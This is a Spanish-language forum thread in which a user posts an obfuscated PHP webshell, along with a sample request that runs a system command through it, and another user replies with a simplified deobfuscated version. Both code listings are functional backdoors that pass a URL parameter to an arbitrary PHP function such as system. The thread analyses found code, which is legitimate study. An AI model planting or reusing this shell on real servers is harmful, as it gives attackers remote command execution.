• [RETO/AYUDA] [PHP] Webshell ofuscado

 #495333  por silver_exploit
 07 Nov 2019, 12:24
Buenas,
Este es mi primer post, así que no tengo muy claro si debería ir aquí.
El caso es que a mis manos ha llegado un código de PHP ofuscado (aclaro que no tengo nada de idea de PHP). Después de un rato de investigación vi que podía ejecutar comandos
Código: [ Debe registrarse para ver este enlace ]
http://localhost/shell.php?xvwxvw=system&4=echo%20%22foyone%20presidente%22

Pero me es imposible desofuscar este código, a ver si alguien me puede ayudar:
Código: [ Debe registrarse para ver este enlace ]
<?php
$_=[];
[email protected]"$_";
$__=!'';
[email protected]"$__";
[email protected]$_[''];
$____=$__;
++$____;
++$____;
$____=$_[$____];
$_=$__;
++$_;
++$_;
++$_;
++$_;
++$_;
[email protected]"$_";
$_____=$____^$__;
$______=$____^$_;
$_______=$___^$__;
$________=$___^$_;
$_________=$__;
--$_________;
[email protected]"$_________";
$__________=$__;
++$__________;
++$__________;
++$__________;
[email protected]"$__________";
$___________=$___;
++$___________;
++$___________;
++$___________;
++$___________;
++$___________;
++$___________;
++$___________;
++$___________;
++$___________;
++$___________;
++$___________;
++$___________;
++$___________;
$____________=$______;
++$____________;
$_____________=$____;
++$_____________;
$______________=$____;
++$______________;
++$______________;
$_______________=$____;
++$_______________;
$💩=s.h.e.l.l;
++$_______________;
++$______________;
$________________=$____;
++$________________;
++$________________;
++$________________;
++$________________;
$_________________=$____;
++$_________________;
++$_________________;
++$_________________;
++$_________________;
++$_________________;
++$_________________;
++$_________________;
++$_________________;
++$_________________;
++$_________________;
++$_________________;
++$_________________;
++$_________________;
++$_________________;
$__________________=$_______;
++$__________________;
++$__________________;
++$__________________;
[email protected][email protected][email protected][email protected][email protected]$__________.''[email protected][email protected][email protected][email protected][email protected][email protected]$________________;
[email protected][email protected][email protected][email protected][email protected][email protected][email protected]$_________;
$_=N.o.n.S.t.o.P;
$______________=base64_decode($____________________);
// base64_decode fue añadido por mi, tenía un error antes y antes era tambien muchos "_"
$___________________=$______;
$____________________=$___________;
$_=A.r.r.a.w.t.s.u;
$_______=$___.$______.$_________________;
$__=!""*73+25-72-$_GET[$_________________];
[email protected]"$__";
[email protected]$_[''];
$____=$__;
++$____;
++$____;
$____=$_[$____];
$_=$__;
++$_;
++$_;
++$_;
++$_;
++$_;
[email protected]"$_";
$_____=$____^$__;
$______=$____^$_;
$_______=$___^$__;
$________=$___^$_;
$_________=$__;
--$_________;
[email protected]"$_________";
$__________=$____;
++$__________;
++$__________;
++$__________;
++$__________;
$___________=$_______;
++$___________;
++$___________;
$____________=$_______;
++$____________;
++$____________;
++$____________;
$_____________=$_______;
++$_____________;
++$_____________;
++$_____________;
++$_____________;
$______________=$_______;
++$______________;
++$______________;
++$______________;
++$______________;
++$______________;
$_______________=$_______;
++$_______________;
++$_______________;
++$_______________;
++$_______________;
++$_______________;
++$_______________;
[email protected][email protected][email protected][email protected][email protected]$_______________;
[email protected][email protected][email protected][email protected][email protected]$_____________;
//$_________________=$________________($_________________);
$_GET[$_________________]($_GET[$__________]);
$__________=$_________________=$___;

?>
 #495337  por Scorpio
 08 Nov 2019, 04:33
Demasiada basura, aun así te lo dejo "desofuscado" y simplificado:
Código: [ Debe registrarse para ver este enlace ]
<?php
 $FunctionSeed = 'Arrawtsu';
 $MagicNumber  = '26';
 $XorValue    = $FunctionSeed[0] ^ $MagicNumber;

 echo '$FunctionSeed  = '.$FunctionSeed.PHP_EOL;
 echo '$MagicNumber    = '.$MagicNumber.PHP_EOL;
 echo '$XorValue      = '.$XorValue.PHP_EOL;

 $Char1=$XorValue;
 ++$Char1;
 ++$Char1;
 ++$Char1;
 echo '$Char1          = '.$Char1.PHP_EOL;

 $Char2=$XorValue;
 ++$Char2;
 ++$Char2;
 ++$Char2;
 ++$Char2;
 echo '$Char2          = '.$Char2.PHP_EOL;

 $Char3 = $XorValue;
 ++$Char3;
 ++$Char3;
 ++$Char3;
 ++$Char3;
 ++$Char3;
 echo '$Char3          = '.$Char3.PHP_EOL;

 $CalledFunction=$Char3.$Char1.$Char2.$Char3.$Char1.$Char2;
 echo '$CalledFunction = '.$CalledFunction.PHP_EOL;

 $CalledString=0;
 ++$CalledString;
 ++$CalledString;
 ++$CalledString;
 ++$CalledString;
 echo '$CalledString  = '.$CalledString.PHP_EOL;
 
 $_GET[$CalledFunction]($_GET[$CalledString]);
?>

//Regards.